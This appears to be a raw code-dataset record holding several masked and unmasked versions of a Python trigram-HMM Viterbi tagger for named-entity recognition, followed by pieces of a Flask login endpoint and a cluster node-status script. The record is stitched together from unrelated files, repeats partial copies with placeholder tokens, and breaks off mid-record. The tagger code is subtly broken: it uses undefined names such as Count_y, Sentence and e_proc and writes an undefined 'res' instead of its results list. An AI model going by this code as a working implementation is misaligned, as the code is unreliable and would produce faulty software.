for i in range(n + 1):
Pi[i - 1] = {}
bp[i - 1] = {}
Pi[-1]['*', '*'] = 1
for k in range(n):
K0 = K
K1 = K
K2 = K
if k == 0:
K0 = ['*']
K1 = ['*']
elif k == 1:
K0 = ['*']
"""
elif k == n-1:
K2 = K + ["STOP"]
"""
for u in K1:
for v in K2:
p = 0
w_arg = ''
key = sentence[k]
if key not in Count_x or Count_x[key] < 5:
key = '_RARE_'
for w in K0:
if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key
) in e[key]:
p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]
if p1 > p:
p = p1
w_arg = w
Pi[k][u, v] = p
bp[k][u, v] = w_arg
y0 = ''
y1 = ''
pmax = 0
for u in K:
for v in K:
if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:
p = Pi[n - 1][u, v] * q[u, v, 'STOP']
if p > pmax:
pmax = p
y0 = u
y1 = v
tag = [y1, y0]
for k in range(n - 3, -1, -1):
y = bp[k + 2][y0, y1]
tag.append(y)
y1 = y0
y0 = y
tag = tag[::-1][2:]
return tag, pmax
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
with open(File) as f:
for i in f.readlines():
data = i.split()
if data[1] == '2-GRAM':
q2[data[2], data[3]] = float(data[0])
q3[data[2], data[3]] = {}
elif data[1] == '3-GRAM':
q3[data[2], data[3]][data[2], data[3], data[4]] = float(data[0])
<|reserved_special_token_0|>
for i in q3:
for j in q3[i]:
q[j] = q3[i][j] / q2[i]
<|reserved_special_token_0|>
def Viterbi(sentence, q, e):
K = list(Count_y.keys())
Pi = {}
bp = {}
n = len(sentence)
for i in range(n + 1):
Pi[i - 1] = {}
bp[i - 1] = {}
Pi[-1]['*', '*'] = 1
for k in range(n):
K0 = K
K1 = K
K2 = K
if k == 0:
K0 = ['*']
K1 = ['*']
elif k == 1:
K0 = ['*']
"""
elif k == n-1:
K2 = K + ["STOP"]
"""
for u in K1:
for v in K2:
p = 0
w_arg = ''
key = sentence[k]
if key not in Count_x or Count_x[key] < 5:
key = '_RARE_'
for w in K0:
if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key
) in e[key]:
p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]
if p1 > p:
p = p1
w_arg = w
Pi[k][u, v] = p
bp[k][u, v] = w_arg
y0 = ''
y1 = ''
pmax = 0
for u in K:
for v in K:
if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:
p = Pi[n - 1][u, v] * q[u, v, 'STOP']
if p > pmax:
pmax = p
y0 = u
y1 = v
tag = [y1, y0]
for k in range(n - 3, -1, -1):
y = bp[k + 2][y0, y1]
tag.append(y)
y1 = y0
y0 = y
tag = tag[::-1][2:]
return tag, pmax
<|reserved_special_token_0|>
for sentence in Sentence:
tag, p = Viterbi(sentence, q, e_proc)
res_viterbi.append(' '.join(tag) + ' ' + str(p) + '\n')
<|reserved_special_token_0|>
with open(File, 'w+') as f:
for i in res:
f.writelines(i)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
File = 'ner_proc.counts'
q2 = {}
q3 = {}
with open(File) as f:
for i in f.readlines():
data = i.split()
if data[1] == '2-GRAM':
q2[data[2], data[3]] = float(data[0])
q3[data[2], data[3]] = {}
elif data[1] == '3-GRAM':
q3[data[2], data[3]][data[2], data[3], data[4]] = float(data[0])
q = {}
for i in q3:
for j in q3[i]:
q[j] = q3[i][j] / q2[i]
<|reserved_special_token_0|>
def Viterbi(sentence, q, e):
K = list(Count_y.keys())
Pi = {}
bp = {}
n = len(sentence)
for i in range(n + 1):
Pi[i - 1] = {}
bp[i - 1] = {}
Pi[-1]['*', '*'] = 1
for k in range(n):
K0 = K
K1 = K
K2 = K
if k == 0:
K0 = ['*']
K1 = ['*']
elif k == 1:
K0 = ['*']
"""
elif k == n-1:
K2 = K + ["STOP"]
"""
for u in K1:
for v in K2:
p = 0
w_arg = ''
key = sentence[k]
if key not in Count_x or Count_x[key] < 5:
key = '_RARE_'
for w in K0:
if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key
) in e[key]:
p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]
if p1 > p:
p = p1
w_arg = w
Pi[k][u, v] = p
bp[k][u, v] = w_arg
y0 = ''
y1 = ''
pmax = 0
for u in K:
for v in K:
if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:
p = Pi[n - 1][u, v] * q[u, v, 'STOP']
if p > pmax:
pmax = p
y0 = u
y1 = v
tag = [y1, y0]
for k in range(n - 3, -1, -1):
y = bp[k + 2][y0, y1]
tag.append(y)
y1 = y0
y0 = y
tag = tag[::-1][2:]
return tag, pmax
res_viterbi = []
for sentence in Sentence:
tag, p = Viterbi(sentence, q, e_proc)
res_viterbi.append(' '.join(tag) + ' ' + str(p) + '\n')
File = 'ner_dev_viterbi.dat'
with open(File, 'w+') as f:
for i in res:
f.writelines(i)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import numpy as np
File = 'ner_proc.counts'
q2 = {}
q3 = {}
with open(File) as f:
for i in f.readlines():
data = i.split()
if data[1] == '2-GRAM':
q2[data[2], data[3]] = float(data[0])
q3[data[2], data[3]] = {}
elif data[1] == '3-GRAM':
q3[data[2], data[3]][data[2], data[3], data[4]] = float(data[0])
q = {}
for i in q3:
for j in q3[i]:
q[j] = q3[i][j] / q2[i]
<|reserved_special_token_0|>
def Viterbi(sentence, q, e):
K = list(Count_y.keys())
Pi = {}
bp = {}
n = len(sentence)
for i in range(n + 1):
Pi[i - 1] = {}
bp[i - 1] = {}
Pi[-1]['*', '*'] = 1
for k in range(n):
K0 = K
K1 = K
K2 = K
if k == 0:
K0 = ['*']
K1 = ['*']
elif k == 1:
K0 = ['*']
"""
elif k == n-1:
K2 = K + ["STOP"]
"""
for u in K1:
for v in K2:
p = 0
w_arg = ''
key = sentence[k]
if key not in Count_x or Count_x[key] < 5:
key = '_RARE_'
for w in K0:
if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key
) in e[key]:
p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]
if p1 > p:
p = p1
w_arg = w
Pi[k][u, v] = p
bp[k][u, v] = w_arg
y0 = ''
y1 = ''
pmax = 0
for u in K:
for v in K:
if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:
p = Pi[n - 1][u, v] * q[u, v, 'STOP']
if p > pmax:
pmax = p
y0 = u
y1 = v
tag = [y1, y0]
for k in range(n - 3, -1, -1):
y = bp[k + 2][y0, y1]
tag.append(y)
y1 = y0
y0 = y
tag = tag[::-1][2:]
return tag, pmax
res_viterbi = []
for sentence in Sentence:
tag, p = Viterbi(sentence, q, e_proc)
res_viterbi.append(' '.join(tag) + ' ' + str(p) + '\n')
File = 'ner_dev_viterbi.dat'
with open(File, 'w+') as f:
for i in res:
f.writelines(i)
<|reserved_special_token_1|>
# -*- coding: utf-8 -*-
"""
Created on Wed May 15 17:05:30 2019
@author: qinzhen
"""
import numpy as np
# =============================================================================
# Q5
# =============================================================================
#### Part 1 计算MLE
File = "ner_proc.counts"
q2 = {}
q3 = {}
with open(File) as f:
for i in f.readlines():
#分隔数据
data = i.split()
#判断
if data[1] == "2-GRAM":
q2[(data[2], data[3])] = float(data[0])
q3[(data[2], data[3])] = {}
elif data[1] == "3-GRAM":
q3[(data[2], data[3])][(data[2], data[3], data[4])] = float(data[0])
#计算 MLE
q = {}
for i in q3:
for j in q3[i]:
q[j] = q3[i][j] / q2[i]
'''
#计算对数概率
for j in q:
res = ' '.join(j) + " : " + str(math.log(q[j]))
print(res)
'''
#### Part 2
def Viterbi(sentence, q, e):
#K_0 = *
#标签数量
K = list(Count_y.keys())
#动态规划表
Pi = {}
#反向指针表
bp = {}
#单词数量
n = len(sentence)
for i in range(n + 1):
Pi[i-1] = {}
bp[i-1] = {}
#初始化
Pi[-1][("*", "*")] = 1
#遍历句子中的单词
for k in range(n):
#可以选的标签
K0 = K
K1 = K
K2 = K
if k == 0:
K0 = ["*"]
K1 = ["*"]
elif k == 1:
K0 = ["*"]
'''
elif k == n-1:
K2 = K + ["STOP"]
'''
#循环
for u in K1:
for v in K2:
p = 0
w_arg = ""
key = sentence[k]
if key not in Count_x or Count_x[key] < 5:
key = "_RARE_"
for w in K0:
if (w, u) in Pi[k-1] and (w, u, v) in q and (v, key) in e[key]:
p1 = Pi[k-1][(w, u)] * q[(w, u, v)] * e[key][(v, key)]
if p1 > p:
p = p1
w_arg = w
Pi[k][(u, v)] = p
bp[k][(u, v)] = w_arg
#计算最后两个标签
y0 = ""
y1 = ""
pmax = 0
for u in K:
for v in K:
if (u, v) in Pi[n-1] and (u, v, "STOP") in q:
p = Pi[n-1][(u, v)] * q[(u, v, "STOP")]
if p > pmax:
pmax = p
y0 = u
y1 = v
tag = [y1, y0]
for k in range(n-3, -1, -1):
y = bp[k+2][(y0, y1)]
tag.append(y)
#更新
y1 = y0
y0 = y
#反序
tag = tag[::-1][2:]
return tag, pmax
res_viterbi = []
for sentence in Sentence:
#print(sentence)
tag, p = Viterbi(sentence, q, e_proc)
res_viterbi.append(" ".join(tag) + " " + str(p) + "\n")
#产生结果
File = "ner_dev_viterbi.dat"
with open(File, "w+") as f:
for i in res:
f.writelines(i)
|
flexible
|
{
"blob_id": "9683c7df01eda0d97615fb3e8f9496ecc95d1d32",
"index": 8494,
"step-1": "<mask token>\n\n\ndef Viterbi(sentence, q, e):\n K = list(Count_y.keys())\n Pi = {}\n bp = {}\n n = len(sentence)\n for i in range(n + 1):\n Pi[i - 1] = {}\n bp[i - 1] = {}\n Pi[-1]['*', '*'] = 1\n for k in range(n):\n K0 = K\n K1 = K\n K2 = K\n if k == 0:\n K0 = ['*']\n K1 = ['*']\n elif k == 1:\n K0 = ['*']\n \"\"\"\n elif k == n-1:\n K2 = K + [\"STOP\"]\n \"\"\"\n for u in K1:\n for v in K2:\n p = 0\n w_arg = ''\n key = sentence[k]\n if key not in Count_x or Count_x[key] < 5:\n key = '_RARE_'\n for w in K0:\n if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key\n ) in e[key]:\n p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]\n if p1 > p:\n p = p1\n w_arg = w\n Pi[k][u, v] = p\n bp[k][u, v] = w_arg\n y0 = ''\n y1 = ''\n pmax = 0\n for u in K:\n for v in K:\n if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:\n p = Pi[n - 1][u, v] * q[u, v, 'STOP']\n if p > pmax:\n pmax = p\n y0 = u\n y1 = v\n tag = [y1, y0]\n for k in range(n - 3, -1, -1):\n y = bp[k + 2][y0, y1]\n tag.append(y)\n y1 = y0\n y0 = y\n tag = tag[::-1][2:]\n return tag, pmax\n\n\n<mask token>\n",
"step-2": "<mask token>\nwith open(File) as f:\n for i in f.readlines():\n data = i.split()\n if data[1] == '2-GRAM':\n q2[data[2], data[3]] = float(data[0])\n q3[data[2], data[3]] = {}\n elif data[1] == '3-GRAM':\n q3[data[2], data[3]][data[2], data[3], data[4]] = float(data[0])\n<mask token>\nfor i in q3:\n for j in q3[i]:\n q[j] = q3[i][j] / q2[i]\n<mask token>\n\n\ndef Viterbi(sentence, q, e):\n K = list(Count_y.keys())\n Pi = {}\n bp = {}\n n = len(sentence)\n for i in range(n + 1):\n Pi[i - 1] = {}\n bp[i - 1] = {}\n Pi[-1]['*', '*'] = 1\n for k in range(n):\n K0 = K\n K1 = K\n K2 = K\n if k == 0:\n K0 = ['*']\n K1 = ['*']\n elif k == 1:\n K0 = ['*']\n \"\"\"\n elif k == n-1:\n K2 = K + [\"STOP\"]\n \"\"\"\n for u in K1:\n for v in K2:\n p = 0\n w_arg = ''\n key = sentence[k]\n if key not in Count_x or Count_x[key] < 5:\n key = '_RARE_'\n for w in K0:\n if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key\n ) in e[key]:\n p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]\n if p1 > p:\n p = p1\n w_arg = w\n Pi[k][u, v] = p\n bp[k][u, v] = w_arg\n y0 = ''\n y1 = ''\n pmax = 0\n for u in K:\n for v in K:\n if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:\n p = Pi[n - 1][u, v] * q[u, v, 'STOP']\n if p > pmax:\n pmax = p\n y0 = u\n y1 = v\n tag = [y1, y0]\n for k in range(n - 3, -1, -1):\n y = bp[k + 2][y0, y1]\n tag.append(y)\n y1 = y0\n y0 = y\n tag = tag[::-1][2:]\n return tag, pmax\n\n\n<mask token>\nfor sentence in Sentence:\n tag, p = Viterbi(sentence, q, e_proc)\n res_viterbi.append(' '.join(tag) + ' ' + str(p) + '\\n')\n<mask token>\nwith open(File, 'w+') as f:\n for i in res:\n f.writelines(i)\n",
"step-3": "<mask token>\nFile = 'ner_proc.counts'\nq2 = {}\nq3 = {}\nwith open(File) as f:\n for i in f.readlines():\n data = i.split()\n if data[1] == '2-GRAM':\n q2[data[2], data[3]] = float(data[0])\n q3[data[2], data[3]] = {}\n elif data[1] == '3-GRAM':\n q3[data[2], data[3]][data[2], data[3], data[4]] = float(data[0])\nq = {}\nfor i in q3:\n for j in q3[i]:\n q[j] = q3[i][j] / q2[i]\n<mask token>\n\n\ndef Viterbi(sentence, q, e):\n K = list(Count_y.keys())\n Pi = {}\n bp = {}\n n = len(sentence)\n for i in range(n + 1):\n Pi[i - 1] = {}\n bp[i - 1] = {}\n Pi[-1]['*', '*'] = 1\n for k in range(n):\n K0 = K\n K1 = K\n K2 = K\n if k == 0:\n K0 = ['*']\n K1 = ['*']\n elif k == 1:\n K0 = ['*']\n \"\"\"\n elif k == n-1:\n K2 = K + [\"STOP\"]\n \"\"\"\n for u in K1:\n for v in K2:\n p = 0\n w_arg = ''\n key = sentence[k]\n if key not in Count_x or Count_x[key] < 5:\n key = '_RARE_'\n for w in K0:\n if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key\n ) in e[key]:\n p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]\n if p1 > p:\n p = p1\n w_arg = w\n Pi[k][u, v] = p\n bp[k][u, v] = w_arg\n y0 = ''\n y1 = ''\n pmax = 0\n for u in K:\n for v in K:\n if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:\n p = Pi[n - 1][u, v] * q[u, v, 'STOP']\n if p > pmax:\n pmax = p\n y0 = u\n y1 = v\n tag = [y1, y0]\n for k in range(n - 3, -1, -1):\n y = bp[k + 2][y0, y1]\n tag.append(y)\n y1 = y0\n y0 = y\n tag = tag[::-1][2:]\n return tag, pmax\n\n\nres_viterbi = []\nfor sentence in Sentence:\n tag, p = Viterbi(sentence, q, e_proc)\n res_viterbi.append(' '.join(tag) + ' ' + str(p) + '\\n')\nFile = 'ner_dev_viterbi.dat'\nwith open(File, 'w+') as f:\n for i in res:\n f.writelines(i)\n",
"step-4": "<mask token>\nimport numpy as np\nFile = 'ner_proc.counts'\nq2 = {}\nq3 = {}\nwith open(File) as f:\n for i in f.readlines():\n data = i.split()\n if data[1] == '2-GRAM':\n q2[data[2], data[3]] = float(data[0])\n q3[data[2], data[3]] = {}\n elif data[1] == '3-GRAM':\n q3[data[2], data[3]][data[2], data[3], data[4]] = float(data[0])\nq = {}\nfor i in q3:\n for j in q3[i]:\n q[j] = q3[i][j] / q2[i]\n<mask token>\n\n\ndef Viterbi(sentence, q, e):\n K = list(Count_y.keys())\n Pi = {}\n bp = {}\n n = len(sentence)\n for i in range(n + 1):\n Pi[i - 1] = {}\n bp[i - 1] = {}\n Pi[-1]['*', '*'] = 1\n for k in range(n):\n K0 = K\n K1 = K\n K2 = K\n if k == 0:\n K0 = ['*']\n K1 = ['*']\n elif k == 1:\n K0 = ['*']\n \"\"\"\n elif k == n-1:\n K2 = K + [\"STOP\"]\n \"\"\"\n for u in K1:\n for v in K2:\n p = 0\n w_arg = ''\n key = sentence[k]\n if key not in Count_x or Count_x[key] < 5:\n key = '_RARE_'\n for w in K0:\n if (w, u) in Pi[k - 1] and (w, u, v) in q and (v, key\n ) in e[key]:\n p1 = Pi[k - 1][w, u] * q[w, u, v] * e[key][v, key]\n if p1 > p:\n p = p1\n w_arg = w\n Pi[k][u, v] = p\n bp[k][u, v] = w_arg\n y0 = ''\n y1 = ''\n pmax = 0\n for u in K:\n for v in K:\n if (u, v) in Pi[n - 1] and (u, v, 'STOP') in q:\n p = Pi[n - 1][u, v] * q[u, v, 'STOP']\n if p > pmax:\n pmax = p\n y0 = u\n y1 = v\n tag = [y1, y0]\n for k in range(n - 3, -1, -1):\n y = bp[k + 2][y0, y1]\n tag.append(y)\n y1 = y0\n y0 = y\n tag = tag[::-1][2:]\n return tag, pmax\n\n\nres_viterbi = []\nfor sentence in Sentence:\n tag, p = Viterbi(sentence, q, e_proc)\n res_viterbi.append(' '.join(tag) + ' ' + str(p) + '\\n')\nFile = 'ner_dev_viterbi.dat'\nwith open(File, 'w+') as f:\n for i in res:\n f.writelines(i)\n",
"step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed May 15 17:05:30 2019\n\n@author: qinzhen\n\"\"\"\n\nimport numpy as np\n\n# =============================================================================\n# Q5\n# =============================================================================\n#### Part 1 计算MLE\nFile = \"ner_proc.counts\"\nq2 = {}\nq3 = {}\nwith open(File) as f:\n for i in f.readlines():\n #分隔数据\n data = i.split()\n #判断\n if data[1] == \"2-GRAM\":\n q2[(data[2], data[3])] = float(data[0])\n q3[(data[2], data[3])] = {}\n elif data[1] == \"3-GRAM\":\n q3[(data[2], data[3])][(data[2], data[3], data[4])] = float(data[0])\n\n#计算 MLE\nq = {}\nfor i in q3:\n for j in q3[i]:\n q[j] = q3[i][j] / q2[i]\n'''\n#计算对数概率\nfor j in q:\n res = ' '.join(j) + \" : \" + str(math.log(q[j]))\n print(res)\n \n'''\n \n#### Part 2\ndef Viterbi(sentence, q, e):\n #K_0 = *\n #标签数量\n K = list(Count_y.keys())\n #动态规划表\n Pi = {}\n #反向指针表\n bp = {}\n #单词数量\n n = len(sentence)\n for i in range(n + 1):\n Pi[i-1] = {}\n bp[i-1] = {}\n #初始化\n Pi[-1][(\"*\", \"*\")] = 1\n #遍历句子中的单词\n for k in range(n):\n #可以选的标签\n K0 = K\n K1 = K\n K2 = K\n if k == 0:\n K0 = [\"*\"]\n K1 = [\"*\"]\n elif k == 1:\n K0 = [\"*\"]\n '''\n elif k == n-1:\n K2 = K + [\"STOP\"]\n '''\n \n #循环\n for u in K1:\n for v in K2:\n p = 0\n w_arg = \"\"\n key = sentence[k]\n if key not in Count_x or Count_x[key] < 5:\n key = \"_RARE_\"\n for w in K0:\n if (w, u) in Pi[k-1] and (w, u, v) in q and (v, key) in e[key]:\n p1 = Pi[k-1][(w, u)] * q[(w, u, v)] * e[key][(v, key)]\n if p1 > p:\n p = p1\n w_arg = w\n Pi[k][(u, v)] = p\n bp[k][(u, v)] = w_arg\n \n #计算最后两个标签\n y0 = \"\"\n y1 = \"\"\n pmax = 0\n for u in K:\n for v in K:\n if (u, v) in Pi[n-1] and (u, v, \"STOP\") in q:\n p = Pi[n-1][(u, v)] * q[(u, v, \"STOP\")]\n if p > pmax:\n pmax = p\n y0 = u\n y1 = v\n \n tag = [y1, y0]\n \n for k in range(n-3, -1, -1):\n y = bp[k+2][(y0, y1)]\n tag.append(y)\n #更新\n y1 = y0\n y0 = y\n \n #反序\n tag = tag[::-1][2:]\n \n return tag, pmax\n\nres_viterbi = []\nfor sentence in Sentence:\n #print(sentence)\n tag, p = Viterbi(sentence, q, e_proc)\n res_viterbi.append(\" \".join(tag) + \" \" + str(p) + \"\\n\")\n\n\n\n#产生结果 \nFile = \"ner_dev_viterbi.dat\"\nwith open(File, \"w+\") as f:\n for i in res:\n f.writelines(i)",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@api.route('/login/', methods=['POST'])
def login():
email = request.get_json().get('email')
pwd = request.get_json().get('password')
user = User.query.filter_by(email=email).first()
if not user:
return jsonify({}), 403
if not user.verify_password(pwd):
return jsonify({}), 400
token = user.generate_auth_token()
return jsonify({'token': token}), 200
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from flask import jsonify, request
from . import api
from muxiwebsite.models import User
from muxiwebsite import db
@api.route('/login/', methods=['POST'])
def login():
email = request.get_json().get('email')
pwd = request.get_json().get('password')
user = User.query.filter_by(email=email).first()
if not user:
return jsonify({}), 403
if not user.verify_password(pwd):
return jsonify({}), 400
token = user.generate_auth_token()
return jsonify({'token': token}), 200
<|reserved_special_token_1|>
# coding: utf-8
"""
login.py
~~~~~~~~
木犀官网登陆API
"""
from flask import jsonify, request
from . import api
from muxiwebsite.models import User
from muxiwebsite import db
@api.route('/login/', methods=['POST'])
def login():
email = request.get_json().get("email")
pwd = request.get_json().get("password")
user = User.query.filter_by(email=email).first()
if not user:
return jsonify({}), 403
if not user.verify_password(pwd):
return jsonify({}), 400
token = user.generate_auth_token()
return jsonify ({
'token': token,
}), 200
|
flexible
|
{
"blob_id": "a0dbb374f803cb05a35f823f54ef5f14eaf328b2",
"index": 3688,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]('/login/', methods=['POST'])\ndef login():\n email = request.get_json().get('email')\n pwd = request.get_json().get('password')\n user = User.query.filter_by(email=email).first()\n if not user:\n return jsonify({}), 403\n if not user.verify_password(pwd):\n return jsonify({}), 400\n token = user.generate_auth_token()\n return jsonify({'token': token}), 200\n",
"step-3": "<mask token>\nfrom flask import jsonify, request\nfrom . import api\nfrom muxiwebsite.models import User\nfrom muxiwebsite import db\n\n\[email protected]('/login/', methods=['POST'])\ndef login():\n email = request.get_json().get('email')\n pwd = request.get_json().get('password')\n user = User.query.filter_by(email=email).first()\n if not user:\n return jsonify({}), 403\n if not user.verify_password(pwd):\n return jsonify({}), 400\n token = user.generate_auth_token()\n return jsonify({'token': token}), 200\n",
"step-4": "# coding: utf-8\n\n\"\"\"\n login.py\n ~~~~~~~~\n\n 木犀官网登陆API\n\n\"\"\"\n\nfrom flask import jsonify, request\nfrom . import api\nfrom muxiwebsite.models import User\nfrom muxiwebsite import db\n\[email protected]('/login/', methods=['POST'])\ndef login():\n email = request.get_json().get(\"email\")\n pwd = request.get_json().get(\"password\")\n\n user = User.query.filter_by(email=email).first()\n if not user:\n return jsonify({}), 403\n if not user.verify_password(pwd):\n return jsonify({}), 400\n\n token = user.generate_auth_token()\n return jsonify ({\n 'token': token,\n }), 200\n\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def main():
""" Execute main program
"""
import argparse
parser = argparse.ArgumentParser(description='Check nodes status.')
parser.add_argument('-o', '--show-job-owners', action='store_true',
help='List jobs running on nodes')
parser.add_argument('-s', '--filter-states', help=
'Display only nodes in FILTER_STATES (comma separated).')
args = parser.parse_args()
check_status(args)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def check_status(args):
""" Print node details
:param args: Arguments from argparse
:type args: argparse.Namespace
"""
cluster = Cluster(jobs_qstat=True, nodes=True, link=True)
nodes = []
if args.filter_states:
cluster.filter_node_states(set(args.filter_states.lower().split(',')))
for node in cluster.nodes:
nodes.append([node.name, node.states, node.load, '%3d/%3d (%3d%%)' %
(node.cpu_res, node.cpu_all, 1.0 * node.cpu_res / node.cpu_all *
100.0) if node.cpu_all else 'N/A', '%5.1f/%5.1fG (%3d%%)' % (
node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.0
) if node.mem_all else 'N/A', ''.join('*' * node.cpu_res + '-' *
(node.cpu_all - node.cpu_res))])
if args.show_job_owners:
nodes[-1][-1] = ''
empty = [''] * 5
users = defaultdict(list)
for job in node.jobs_qstat:
users[job.user].append(job)
for orphan in node.orphans:
users['ORPHANS'].append(orphan)
for idx, uitem in enumerate(users.items()):
u, jobs = uitem
column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in
jobs]))
if idx:
nodes.append(empty + [column_data])
else:
nodes[-1][-1] = column_data
print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory',
'Jobs'], nodes)
def main():
""" Execute main program
"""
import argparse
parser = argparse.ArgumentParser(description='Check nodes status.')
parser.add_argument('-o', '--show-job-owners', action='store_true',
help='List jobs running on nodes')
parser.add_argument('-s', '--filter-states', help=
'Display only nodes in FILTER_STATES (comma separated).')
args = parser.parse_args()
check_status(args)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def check_status(args):
""" Print node details
:param args: Arguments from argparse
:type args: argparse.Namespace
"""
cluster = Cluster(jobs_qstat=True, nodes=True, link=True)
nodes = []
if args.filter_states:
cluster.filter_node_states(set(args.filter_states.lower().split(',')))
for node in cluster.nodes:
nodes.append([node.name, node.states, node.load, '%3d/%3d (%3d%%)' %
(node.cpu_res, node.cpu_all, 1.0 * node.cpu_res / node.cpu_all *
100.0) if node.cpu_all else 'N/A', '%5.1f/%5.1fG (%3d%%)' % (
node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.0
) if node.mem_all else 'N/A', ''.join('*' * node.cpu_res + '-' *
(node.cpu_all - node.cpu_res))])
if args.show_job_owners:
nodes[-1][-1] = ''
empty = [''] * 5
users = defaultdict(list)
for job in node.jobs_qstat:
users[job.user].append(job)
for orphan in node.orphans:
users['ORPHANS'].append(orphan)
for idx, uitem in enumerate(users.items()):
u, jobs = uitem
column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in
jobs]))
if idx:
nodes.append(empty + [column_data])
else:
nodes[-1][-1] = column_data
print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory',
'Jobs'], nodes)
def main():
""" Execute main program
"""
import argparse
parser = argparse.ArgumentParser(description='Check nodes status.')
parser.add_argument('-o', '--show-job-owners', action='store_true',
help='List jobs running on nodes')
parser.add_argument('-s', '--filter-states', help=
'Display only nodes in FILTER_STATES (comma separated).')
args = parser.parse_args()
check_status(args)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
from collections import defaultdict
from cluster.common import Cluster
from cluster.tools import print_table
def check_status(args):
""" Print node details
:param args: Arguments from argparse
:type args: argparse.Namespace
"""
cluster = Cluster(jobs_qstat=True, nodes=True, link=True)
nodes = []
if args.filter_states:
cluster.filter_node_states(set(args.filter_states.lower().split(',')))
for node in cluster.nodes:
nodes.append([node.name, node.states, node.load, '%3d/%3d (%3d%%)' %
(node.cpu_res, node.cpu_all, 1.0 * node.cpu_res / node.cpu_all *
100.0) if node.cpu_all else 'N/A', '%5.1f/%5.1fG (%3d%%)' % (
node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.0
) if node.mem_all else 'N/A', ''.join('*' * node.cpu_res + '-' *
(node.cpu_all - node.cpu_res))])
if args.show_job_owners:
nodes[-1][-1] = ''
empty = [''] * 5
users = defaultdict(list)
for job in node.jobs_qstat:
users[job.user].append(job)
for orphan in node.orphans:
users['ORPHANS'].append(orphan)
for idx, uitem in enumerate(users.items()):
u, jobs = uitem
column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in
jobs]))
if idx:
nodes.append(empty + [column_data])
else:
nodes[-1][-1] = column_data
print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory',
'Jobs'], nodes)
def main():
""" Execute main program
"""
import argparse
parser = argparse.ArgumentParser(description='Check nodes status.')
parser.add_argument('-o', '--show-job-owners', action='store_true',
help='List jobs running on nodes')
parser.add_argument('-s', '--filter-states', help=
'Display only nodes in FILTER_STATES (comma separated).')
args = parser.parse_args()
check_status(args)
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
#!/usr/bin/env python
from collections import defaultdict
from cluster.common import Cluster
from cluster.tools import print_table
def check_status(args):
""" Print node details
:param args: Arguments from argparse
:type args: argparse.Namespace
"""
cluster = Cluster(jobs_qstat=True, nodes=True, link=True)
nodes = []
if args.filter_states:
cluster.filter_node_states(set(args.filter_states.lower().split(',')))
for node in cluster.nodes:
nodes.append([
node.name,
node.states,
node.load,
"%3d/%3d (%3d%%)" % (
node.cpu_res, node.cpu_all, 1. * node.cpu_res / node.cpu_all * 100.) if node.cpu_all else 'N/A', # Cores
"%5.1f/%5.1fG (%3d%%)" % (
node.mem_res, node.mem_all, node.mem_res / node.mem_all * 100.) if node.mem_all else 'N/A', # Memory
''.join(('*' * node.cpu_res) + ('-' * (node.cpu_all - node.cpu_res)))
])
if args.show_job_owners:
nodes[-1][-1] = ''
empty = [''] * 5
users = defaultdict(list)
for job in node.jobs_qstat:
users[job.user].append(job)
for orphan in node.orphans:
users['ORPHANS'].append(orphan)
for idx, uitem in enumerate(users.items()):
u, jobs = uitem
column_data = '%s: %s' % (u, ' '.join([str(j.job_id) for j in jobs]))
if idx:
nodes.append(empty + [column_data])
else:
nodes[-1][-1] = column_data
# Printing bits
print_table(['Node', 'Status', 'Load', 'Used cores', 'Used memory', 'Jobs'], nodes)
def main():
""" Execute main program
"""
# noinspection PyCompatibility
import argparse
parser = argparse.ArgumentParser(description='Check nodes status.')
parser.add_argument('-o', '--show-job-owners', action='store_true', help='List jobs running on nodes')
parser.add_argument('-s', '--filter-states', help='Display only nodes in FILTER_STATES (comma separated).')
args = parser.parse_args()
check_status(args)
if __name__ == '__main__':
main()
|
flexible
|
{
"blob_id": "381b59ab9fa85561932a9bfb9ab8cef635901a35",
"index": 7249,
